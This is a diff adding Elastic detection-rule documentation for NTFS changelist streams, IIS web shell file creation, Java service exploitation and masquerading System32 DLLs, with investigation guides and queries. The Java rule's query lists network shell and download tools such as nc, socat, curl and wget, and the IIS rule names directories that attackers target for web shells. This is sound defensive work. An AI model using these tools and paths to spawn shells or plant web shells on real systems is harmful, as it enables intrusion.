host.os.type == "windows" + and process.pid != 4 + and not ( + user.id == "S-1-5-18" + and to_lower(process.executable) like """?:\\windows\\system32\\mrt.exe""" + and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation") + and process.code_signature.trusted == true + ) + and ( + ( + event.category == "file" + and event.type == "creation" + and ends_with(to_lower(file.name), ":changelist") + ) + or ( + event.category == "registry" + and event.type == "change" + and to_lower(registry.path) like """*\\system\\*controlset*\\services\\*\\args""" + and to_lower(registry.data.strings) like "*:changelist" + ) + ) +| keep + @timestamp, + host.id, + host.name, + user.id, + user.name, + process.pid, + process.name, + process.executable, + process.code_signature.subject_name, + event.category, + event.type, + file.path, + file.name, + file.size, + registry.path, + registry.value, + registry.data.strings, + data_stream.namespace, + _id, + _version, + _index +| limit 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: NTFS File Attributes +** ID: T1564.004 +** Reference URL: https://attack.mitre.org/techniques/T1564/004/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc new file mode 100644 index 0000000000..d71181e71f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation]] +=== Potential IIS Web Shell File Creation + +Identifies the creation of ASPX/ASHX/ASMX files in specific directories that are commonly targeted by attackers to deploy web shells. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-sentinel_one_cloud_funnel.* +* logs-m365_defender.event-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.viettelcybersecurity.com/toolshell-a-critical-sharepoint-vulnerability-chain-under-active-exploitation/ +* https://www.sentinelone.com/blog/sharepoint-toolshell-zero-day-exploited-in-the-wild-targets-enterprise-servers/ +* https://www.rapid7.com/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender XDR +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential IIS Web Shell File Creation* + + +Web shells are malicious scripts uploaded to web servers, often exploiting vulnerabilities in web applications. Those files, used in Windows environments, can be manipulated by attackers to maintain persistence and execute arbitrary commands. Adversaries target specific directories for deploying these files. The detection rule identifies suspicious ASPX file creation in these directories, excluding legitimate processes, to flag potential web shell activity. + + +*Possible investigation steps* + + +- Review the file path where the ASPX/ASHX/ASMX file was created to confirm it matches the targeted directory pattern. This can help determine if the file is in a location commonly exploited for web shells. +- Examine the process that created the ASPX/ASHX/ASMX file to assess its legitimacy and potential malicious intent. +- Check the timestamp of the file creation event to correlate it with other suspicious activities or alerts on the host, which might provide additional context or evidence of compromise. +- Investigate the contents of the ASPX/ASHX/ASMX file to identify any malicious code or scripts that could indicate a web shell. Look for patterns or code snippets commonly associated with web shell functionality. +- Analyze network activity from the host around the time of the ASPX file creation to identify any unusual outbound connections or data transfers that might suggest communication with a command and control server. +- Review historical alerts and logs for the host to identify any previous suspicious activities or patterns that could indicate ongoing compromise or persistence mechanisms. + + +*False positive analysis* + + +- Routine updates or installations of legitimate web server components may trigger alerts. Users can create exceptions for known update processes or installation paths to reduce false positives. +- Development or testing environments often generate ASPX files as part of normal operations. Exclude directories or processes associated with these environments to prevent unnecessary alerts. +- Automated scripts or tools used for web server maintenance might create ASPX files. Identify and whitelist these scripts to avoid false detections. +- Legitimate third-party applications that integrate with web server extensions may create ASPX files. Monitor and whitelist these applications to ensure they do not trigger false positives. +- Scheduled tasks or system processes that interact with web server directories can be mistaken for malicious activity. Review and exclude these tasks if they are verified as non-threatening. + + +*Response and remediation* + + +- Isolate the affected server from the network to prevent further malicious activity and lateral movement. +- Terminate any suspicious processes associated with the creation of the ASPX file, especially those not originating from legitimate executables like msiexec.exe. +- Remove the identified ASPX file from the targeted directory to eliminate the potential web shell. +- Conduct a thorough scan of the server using updated antivirus and endpoint detection tools to identify and remove any additional malicious files or processes. +- Review server logs and network traffic for signs of unauthorized access or data exfiltration, and document any findings for further analysis. +- Restore the server from a known good backup if necessary, ensuring that the backup is free from any malicious artifacts. +- Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures, such as patching vulnerabilities or enhancing monitoring capabilities. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/crowdstrike-integration[CrowdStrike] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/sysmon-event-11-setup[Sysmon Event ID 11 - File Create] + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and file.extension : ("aspx", "ashx", "asmx") and + process.name : ("w3wp.exe", "MSExchangeMailboxReplication.exe", "EdgeTransport.exe", "Microsoft.Exchange.*.exe", "UMWorkerProcess.exe", "umservice.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "xcopy.exe") and + ( + (file.path : ("?:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\*\\TEMPLATE\\LAYOUTS\\*", + "?:\\inetpub\\wwwroot\\aspnet_client\\system_web\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\owa\\auth\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\ecp\\auth\\*") and + /* not sub-dirs */ + not file.path : ("?:\\inetpub\\wwwroot\\aspnet_client\\system_web\\*\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\*\\auth\\*\\*", + "?:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\*\\TEMPLATE\\LAYOUTS\\*\\*")) or + + /* not sub-dirs */ + (file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*" and not file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*\\*") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process.asciidoc new file mode 100644 index 0000000000..e2e942c3ac --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process.asciidoc @@ -0,0 +1,163 @@ +[[prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process]] +=== Potential Java Service Exploitation via Suspicious Child Process + +Identifies a Java process that accepts an inbound network connection and then spawns a suspicious child process. This may indicate exploitation of a Java service that runs attacker-controlled code, such as one that deserializes untrusted objects. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.lunasec.io/docs/blog/log4j-zero-day/ +* https://github.com/christophetd/log4shell-vulnerable-app +* https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security +* https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046 +* https://archive.ph/Xowgn + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Use Case: Vulnerability +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Java Service Exploitation via Suspicious Child Process* + + +Some Java services accept inbound connections and deserialize untrusted objects, such as a leftover Log4j socket or collector that rebuilds serialized `LogEvent` objects through `FilteredObjectInputStream`. If that path can be reached, an attacker can send a crafted payload to the listening port and get the JVM to run attacker-controlled code. This rule looks for a Java process that accepts an inbound connection on a service port from an ephemeral source port, then quickly starts a suspicious child process (shell, interpreter, curl, or wget) whose working directory is under `/opt`. That sequence is consistent with remote code execution against a Java listener rather than a normal outbound application callback. + + +*Possible investigation steps* + + +- Confirm the inbound `connection_accepted` event: Java was the accepting process, `network.direction` is ingress, the destination port is a service port (below 49152), and the source port is ephemeral (32768 or higher on Linux; 49152 or higher is typical on macOS). +- Identify the source IP and determine whether it is expected to talk to this Java service. Internal sources still matter; a collector or socket server exposed only on a private network can still be used for lateral movement. +- Review the child process that started within a few seconds of the accepted connection. Check `process.name`, `process.command_line`, `process.working_directory`, and the parent/child PID relationship to Java. +- Inspect the Java process command line and working directory to see which application accepted the connection (for example a service under `/opt`) and whether it is a known listener that deserializes input. +- Look for follow-on activity on the same host after the child process: additional shells, file writes under `/tmp` or `/opt`, new outbound connections, or persistence changes. +- Correlate with other alerts on the same host or user around the same time to see whether this is isolated or part of a broader intrusion. + + +*False positive analysis* + + +- Java services installed may spawn shells or interpreters during install, upgrade, health checks, or administrative scripts. Confirm whether the child command line matches a known maintenance pattern before treating the alert as malicious. +- Some already-excluded patterns include Flutter tooling, Jira helper scripts, and trivial `bash -c` probes such as `ulimit` or `echo $$`. Add similar exceptions for other trusted `/opt` applications when the parent Java process and command line are stable. +- Development or lab collectors that intentionally accept serialized Java objects will match this rule if they also start a shell. Restrict those hosts or exclude the specific service path if that activity is expected. +- Containerized or non-`/opt` Java applications are outside this rule's working-directory constraint and should not be tuned here; investigate those with a broader hunt if needed. + + +*Response and remediation* + + +- Isolate the affected host from the network to stop further inbound exploitation and limit lateral movement. +- Stop the suspicious child processes and, if exploitation is confirmed, stop the Java listener that accepted the connection until it can be patched or removed. +- Capture the Java process command line, listening port, child process command line, and inbound source IP for scoping. +- Hunt for the same source IP, the same Java service path, and similar child processes on other hosts. +- Remove or disable unused Java socket servers, collectors, or sample bridges that deserialize untrusted input. Patch remaining Java applications and apply a JVM-wide serialization filter where deserialization cannot be avoided. +- Restore from a known-good backup if unauthorized files, persistence, or additional malware are found. +- Escalate to the security operations center or incident response team if the inbound source, child process, or follow-on activity indicates a successful compromise. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [network where event.action == "connection_accepted" and network.direction == "ingress" and + + process.name : "java" and + destination.port < 49152 and source.port >= 32768] by process.pid + [process where event.type == "start" and + + /* Suspicious JAVA child process */ + process.parent.name : "java" and + process.name : ( + "sh", "bash", "dash", "ksh", "tcsh", "zsh", "ash", "mksh", "busybox", + "curl", "wget", "perl*", "python*", "ruby*", "php*", "lua*", "socat", + "nc", "ncat", "netcat", "netcat.openbsd", "netcat.traditional", "nc.openbsd", + "nc.traditional", "nohup", "setsid", "disown", "hostname", "whoami", "id" + ) and + not process.command_line like~ ( + "bash -c ulimit -u", + "bash /opt/flutter/bin/flutter*", + "bash -c echo $$", + "/bin/bash /opt/python3/bin/jira*", + "/bin/sh -c env LC_ALL=C /usr/sbin/lpc status*" + )] by process.parent.pid + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll.asciidoc new file mode 100644 index 0000000000..277bc0b9ff --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll.asciidoc @@ -0,0 +1,237 @@ +[[prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll]] +=== Potential Masquerading as System32 DLL + +Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.library-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* Data Source: Elastic Defend +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 112 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Masquerading as System32 DLL* + + +This rule fires when a DLL with a name matching a known Windows System32 library is loaded from an unexpected path, is unsigned or signed by a non-Microsoft certificate, and was recently created or modified (within the last hour). This pattern is consistent with DLL Search Order Hijacking, DLL planting, or backdooring/resigning of legitimate system DLLs — all common defense evasion and persistence techniques used by both commodity malware and sophisticated threat actors. + + +*Possible investigation steps* + + +- Examine the full `dll.path` to determine where the suspicious DLL was loaded from. Paths under user-writable directories (`AppData`, `Temp`, `Downloads`, `ProgramData`) or application directories are high-fidelity indicators. +- Review `dll.code_signature` fields — check whether the DLL is unsigned, self-signed, or signed by an unexpected publisher. A trusted signature from a legitimate vendor may indicate a false positive; an invalid or absent signature warrants deeper investigation. +- Check `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` — a DLL dropped and loaded within seconds or minutes of each other strongly suggests staged execution. +- Identify the loading process (`process.name`, `process.executable`, `process.pid`) and examine its parent chain for unusual ancestry (e.g. Office spawning a loader, or a browser dropping a DLL). +- Retrieve the DLL and hash it with `Get-FileHash -Algorithm SHA256`. Search the hash across VirusTotal, Hybrid-Analysis, MalwareBazaar, and CISCO Talos. +- Check whether other hosts in the environment have loaded the same DLL path or hash — a single host is likely targeted or hands-on, widespread hits may indicate a worm or supply chain issue. +- Correlate with process creation events around the same timestamp to identify what dropped the DLL (downloaders, document macros, installers, etc.). +- Inspect the directory containing the DLL for other recently created files, scripts, or executables that may be part of the same drop. + + +*False positive analysis* + + +- Legitimate third-party software occasionally ships DLLs with names that collide with System32 libraries (e.g. security vendors, game engines, virtualization software, and enterprise tooling). Validate the publisher via `dll.code_signature.subject_name` and cross-reference against known software installed on the host. +- Installer and update workflows may briefly stage DLLs in temp paths before moving them to their final location — check whether the loading process is a known installer (`msiexec.exe`, `setup.exe`, vendor updaters) and whether the DLL path disappears after a short window. +- DismHost.exe staging certain DLLs under `C:\Windows\Temp\` during servicing operations is a known benign pattern already excluded in the query. + + +*Related rules* + + +- Suspicious DLL Loaded for Persistence via Desktop File - c4818812-d44f-47be-aaef-4cfb2f9cc799 +- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26 +- Potential DLL Side-Loading via Trusted Microsoft Programs - 1160dcdb-0a0a-4a79-91d8-9b84af7e0240 + + +*Response and remediation* + + +- Initiate the incident response process based on triage outcome. If the DLL is confirmed malicious, treat the host as compromised. +- Isolate the affected host and preserve a memory dump and disk image before remediation to retain forensic evidence. +- Delete the malicious DLL and any associated files identified during investigation. +- If DLL Search Order Hijacking is confirmed, identify the vulnerable application and remediate by patching, applying a safe DLL search mode (`HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode`), or restricting write permissions on directories in the application's search path. +- If a legitimate binary was backdoored and resigned, treat all binaries delivered via the same channel as suspect and investigate the supply chain. +- Block identified file hashes and signer certificates as appropriate at the endpoint and perimeter. +- Hunt for lateral movement or persistence mechanisms established after the DLL was loaded — check scheduled tasks, services, registry run keys, and WMI subscriptions created around the same timeframe. +- Determine the initial access vector and remediate to prevent reinfection. + + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and event.action == "load" and +(dll.Ext.relative_file_creation_time <= 3600 or dll.Ext.relative_file_name_modify_time <= 3600) and + not ( + dll.path : ( + "?:\\Windows\\System32\\*", + "?:\\Windows\\SysWOW64\\*", + "?:\\Windows\\SystemTemp\\*", + "?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\*", + "?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\*", + "?:\\$WINDOWS.~BT\\Sources\\*", + "?:\\$WINDOWS.~BT\\Work\\*", + "?:\\Windows\\WinSxS\\*", + "?:\\Windows\\SoftwareDistribution\\Download\\*", + "?:\\Windows\\assembly\\NativeImages_v*" + ) + ) and + not ( + dll.code_signature.subject_name in ( + "Microsoft Windows", + "Microsoft Corporation", + "Microsoft Windows Hardware Abstraction Layer Publisher", + "Microsoft Windows Publisher", + "Microsoft Windows 3rd party Component", + "Microsoft 3rd Party Application Component" + ) and dll.code_signature.trusted == true + ) and not dll.code_signature.status : ("errorCode_endpoint*", "errorUntrustedRoot", "errorChaining") and + dll.name : ( + "aadauthhelper.dll", "aadcloudap.dll", "aadjcsp.dll", "aadtb.dll", "aadwamextension.dll", "aarsvc.dll", "abovelockapphost.dll", "accessibilitycpl.dll", "accountaccessor.dll", "accountsrt.dll", "acgenral.dll", "aclayers.dll", "acledit.dll", "aclui.dll", "acmigration.dll", "acppage.dll", "acproxy.dll", "acspecfc.dll", "actioncenter.dll", "actioncentercpl.dll", "actionqueue.dll", "activationclient.dll", "activeds.dll", "activesynccsp.dll", "actxprxy.dll", "acwinrt.dll", "acxtrnal.dll", "adaptivecards.dll", "addressparser.dll", "adhapi.dll", "adhsvc.dll", "admtmpl.dll", "adprovider.dll", "adrclient.dll", "adsldp.dll", "adsldpc.dll", "adsmsext.dll", "adsnt.dll", "adtschema.dll", "advancedemojids.dll", "advapi32.dll", "advapi32res.dll", "advpack.dll", "aeevts.dll", "aeinv.dll", "aepic.dll", "ajrouter.dll", "altspace.dll", "amsi.dll", "amsiproxy.dll", "amstream.dll", "apds.dll", "aphostclient.dll", "aphostres.dll", "aphostservice.dll", "apisampling.dll", "apisetschema.dll", "apmon.dll", "apmonui.dll", "appcontracts.dll", "appextension.dll", "apphelp.dll", "apphlpdm.dll", "appidapi.dll", "appidsvc.dll", "appinfo.dll", "appinfoext.dll", "applicationframe.dll", "applockercsp.dll", "appmgmts.dll", "appmgr.dll", "appmon.dll", "appointmentapis.dll", "appraiser.dll", "appreadiness.dll", "apprepapi.dll", "appresolver.dll", "appsruprov.dll", "appvcatalog.dll", "appvclientps.dll", "appvetwclientres.dll", "appvintegration.dll", "appvmanifest.dll", "appvpolicy.dll", "appvpublishing.dll", "appvreporting.dll", "appvscripting.dll", "appvsentinel.dll", "appvstreamingux.dll", "appvstreammap.dll", "appvterminator.dll", "appxalluserstore.dll", "appxpackaging.dll", "appxsip.dll", "appxsysprep.dll", "archiveint.dll", "asferror.dll", "aspnet_counters.dll", "asycfilt.dll", "atl.dll", "atlthunk.dll", "atmlib.dll", "audioeng.dll", "audiohandlers.dll", "audiokse.dll", "audioses.dll", "audiosrv.dll", "auditcse.dll", "auditpolcore.dll", "auditpolmsg.dll", "authbroker.dll", "authbrokerui.dll", "authentication.dll", "authext.dll", "authfwcfg.dll", "authfwgp.dll", "authfwsnapin.dll", "authfwwizfwk.dll", "authhostproxy.dll", "authui.dll", "authz.dll", "autopilot.dll", "autopilotdiag.dll", "autoplay.dll", "autotimesvc.dll", "avicap32.dll", "avifil32.dll", "avrt.dll", "axinstsv.dll", "azroles.dll", "azroleui.dll", "azsqlext.dll", "basecsp.dll", "basesrv.dll", "batmeter.dll", "bcastdvrbroker.dll", "bcastdvrclient.dll", "bcastdvrcommon.dll", "bcd.dll", "bcdprov.dll", "bcdsrv.dll", "bcp47langs.dll", "bcp47mrm.dll", "bcrypt.dll", "bcryptprimitives.dll", "bdehdcfglib.dll", "bderepair.dll", "bdesvc.dll", "bdesysprep.dll", "bdeui.dll", "bfe.dll", "bi.dll", "bidispl.dll", "bindfltapi.dll", "bingasds.dll", "bingfilterds.dll", "bingmaps.dll", "biocredprov.dll", "bisrv.dll", "bitlockercsp.dll", "bitsigd.dll", "bitsperf.dll", "bitsproxy.dll", "biwinrt.dll", "blbevents.dll", "blbres.dll", "blb_ps.dll", "bluetoothapis.dll", "bnmanager.dll", "bootmenuux.dll", "bootstr.dll", "bootux.dll", "bootvid.dll", "bridgeres.dll", "brokerlib.dll", "browcli.dll", "browserbroker.dll", "browseui.dll", "btagservice.dll", "bthavctpsvc.dll", "bthavrcp.dll", "bthavrcpappsvc.dll", "bthci.dll", "bthpanapi.dll", "bthradiomedia.dll", "bthserv.dll", "bthtelemetry.dll", "btpanui.dll", "bwcontexthandler.dll", "cabapi.dll", "cabinet.dll", "cabview.dll", "callbuttons.dll", "cameracaptureui.dll", "capauthz.dll", "capiprovider.dll", "capisp.dll", "captureservice.dll", "castingshellext.dll", "castlaunch.dll", "catsrv.dll", "catsrvps.dll", "catsrvut.dll", "cbdhsvc.dll", "cca.dll", "cdd.dll", "cdosys.dll", "cdp.dll", "cdprt.dll", "cdpsvc.dll", "cdpusersvc.dll", "cemapi.dll", "certca.dll", "certcli.dll", "certcredprovider.dll", "certenc.dll", "certenroll.dll", "certenrollui.dll", "certmgr.dll", "certpkicmdlet.dll", "certpoleng.dll", "certprop.dll", "cewmdm.dll", "cfgbkend.dll", "cfgmgr32.dll", "cfgspcellular.dll", "cfgsppolicy.dll", "cflapi.dll", "cfmifs.dll", "cfmifsproxy.dll", "chakra.dll", "chakradiag.dll", "chakrathunk.dll", "chartv.dll", "chatapis.dll", "chkwudrv.dll", "chsstrokeds.dll", "chtbopomofods.dll", "chtcangjieds.dll", "chthkstrokeds.dll", "chtquickds.dll", "chxapds.dll", "chxdecoder.dll", "chxhapds.dll", "chxinputrouter.dll", "chxranker.dll", "ci.dll", "cic.dll", "cimfs.dll", "circoinst.dll", "ciwmi.dll", "clb.dll", "clbcatq.dll", "cldapi.dll", "cleanpccsp.dll", "clfsw32.dll", "cliconfg.dll", "clipboardserver.dll", "clipc.dll", "clipsvc.dll", "clipwinrt.dll", "cloudap.dll", "cloudidsvc.dll", "clrhost.dll", "clusapi.dll", "cmcfg32.dll", "cmdext.dll", "cmdial32.dll", "cmgrcspps.dll", "cmifw.dll", "cmintegrator.dll", "cmlua.dll", "cmpbk32.dll", "cmstplua.dll", "cmutil.dll", "cngcredui.dll", "cngprovider.dll", "cnvfat.dll", "cofiredm.dll", "colbact.dll", "colorcnv.dll", "colorui.dll", "combase.dll", "comcat.dll", "comctl32.dll", "comdlg32.dll", "coml2.dll", "comppkgsup.dll", "compstui.dll", "computecore.dll", "computenetwork.dll", "computestorage.dll", "comrepl.dll", "comres.dll", "comsnap.dll", "comsvcs.dll", "comuid.dll", "configmanager2.dll", "conhostv1.dll", "connect.dll", "consentux.dll", "consentuxclient.dll", "console.dll", "consolelogon.dll", "contactapis.dll", "container.dll", "coredpus.dll", "coreglobconfig.dll", "coremas.dll", "coremessaging.dll", "coremmres.dll", "coreshell.dll", "coreshellapi.dll", "coreuicomponents.dll", "correngine.dll", "courtesyengine.dll", "cpfilters.dll", "creddialogbroker.dll", "credprovhelper.dll", "credprovhost.dll", "credprovs.dll", "credprovslegacy.dll", "credssp.dll", "credui.dll", "crypt32.dll", "cryptbase.dll", "cryptcatsvc.dll", "cryptdlg.dll", "cryptdll.dll", "cryptext.dll", "cryptnet.dll", "cryptngc.dll", "cryptowinrt.dll", "cryptsp.dll", "cryptsvc.dll", "crypttpmeksvc.dll", "cryptui.dll", "cryptuiwizard.dll", "cryptxml.dll", "cscapi.dll", "cscdll.dll", "cscmig.dll", "cscobj.dll", "cscsvc.dll", "cscui.dll", "csplte.dll", "cspproxy.dll", "csrsrv.dll", "cxcredprov.dll", "c_g18030.dll", "c_gsm7.dll", "c_is2022.dll", "c_iscii.dll", "d2d1.dll", "d3d10.dll", "d3d10core.dll", "d3d10level9.dll", "d3d10warp.dll", "d3d10_1.dll", "d3d10_1core.dll", "d3d11.dll", "d3d11on12.dll", "d3d12.dll", "d3d12core.dll", "d3d8thk.dll", "d3d9.dll", "d3d9on12.dll", "d3dscache.dll", "dab.dll", "dabapi.dll", "daconn.dll", "dafbth.dll", "dafdnssd.dll", "dafescl.dll", "dafgip.dll", "dafiot.dll", "dafipp.dll", "dafmcp.dll", "dafpos.dll", "dafprintprovider.dll", "dafupnp.dll", "dafwcn.dll", "dafwfdprovider.dll", "dafwiprov.dll", "dafwsd.dll", "damediamanager.dll", "damm.dll", "das.dll", "dataclen.dll", "datusage.dll", "davclnt.dll", "davhlpr.dll", "davsyncprovider.dll", "daxexec.dll", "dbgcore.dll", "dbgeng.dll", "dbghelp.dll", "dbgmodel.dll", "dbnetlib.dll", "dbnmpntw.dll", "dciman32.dll", "dcntel.dll", "dcomp.dll", "ddaclsys.dll", "ddcclaimsapi.dll", "ddds.dll", "ddisplay.dll", "ddoiproxy.dll", "ddores.dll", "ddpchunk.dll", "ddptrace.dll", "ddputils.dll", "ddp_ps.dll", "ddraw.dll", "ddrawex.dll", "defragproxy.dll", "defragres.dll", "defragsvc.dll", "deploymentcsps.dll", "deskadp.dll", "deskmon.dll", "desktopshellext.dll", "devenum.dll", "deviceaccess.dll", "devicecenter.dll", "devicecredential.dll", "devicepairing.dll", "deviceuxres.dll", "devinv.dll", "devmgr.dll", "devobj.dll", "devpropmgr.dll", "devquerybroker.dll", "devrtl.dll", "dfdts.dll", "dfscli.dll", "dfshim.dll", "dfsshlex.dll", "dggpext.dll", "dhcpcmonitor.dll", "dhcpcore.dll", "dhcpcore6.dll", "dhcpcsvc.dll", "dhcpcsvc6.dll", "dhcpsapi.dll", "diagcpl.dll", "diagnosticlogcsp.dll", "diagperf.dll", "diagsvc.dll", "diagtrack.dll", "dialclient.dll", "dialserver.dll", "dictationmanager.dll", "difxapi.dll", "dimsjob.dll", "dimsroam.dll", "dinput.dll", "dinput8.dll", "direct2ddesktop.dll", "directml.dll", "discan.dll", "dismapi.dll", "dispbroker.dll", "dispex.dll", "display.dll", "displaymanager.dll", "dlnashext.dll", "dmappsres.dll", "dmcfgutils.dll", "dmcmnutils.dll", "dmcsps.dll", "dmdlgs.dll", "dmdskmgr.dll", "dmdskres.dll", "dmdskres2.dll", 